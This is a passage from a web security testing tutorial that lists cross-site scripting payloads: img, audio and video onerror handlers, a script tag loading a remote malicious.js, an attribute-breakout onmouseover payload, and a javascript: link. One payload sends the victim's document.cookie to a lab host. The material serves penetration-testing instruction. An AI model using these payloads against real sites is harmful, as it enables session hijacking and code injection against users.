In this recipe, we used the <script> tag to inject a JavaScript code block into the page; however, this is not the only HTML tag we can use, especially with the additions made by HTML5, where we have <video> and <audio>, for example. Let's see some other payloads we could have used to exploit XSS:

• Generating an error event on tags with an src/source parameter, such as <img>, <audio>, and <video>:

<img src=X onerror="javascript:document.write('<img src=&quot;http://192.168.56.10:88/img'+document.cookie+'&quot;>')">

Or, use the following:

<audio><source onerror="javascript:alert('XSS')">

Or, there is also this:

<video><source onerror="javascript:alert('XSS')">

• Injecting a <script> tag that loads an external JavaScript file:

<script src="http://192.168.56.10:88/malicious.js">

• If the injected text is set as a value inside an HTML tag and surrounded by quotes ("), like in <input value="injectable_text">, we can close the quotes and add an event to the code. For example, replace injectable_text with the following code. Notice how the last quote is not closed so we can use the one already in the HTML code:

" onmouseover="javascript:alert('XSS')

• Injecting a link or other tag with the href property to make it execute code whenever it is clicked:

<a href="javascript:alert('XSS')">Click here</a>

There are a multitude of variations of tags, encodings, and instructions that can be used to exploit an XSS vulnerability. For a more complete reference, see the OWASP XSS Filter Evasion Cheat Sheet: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet.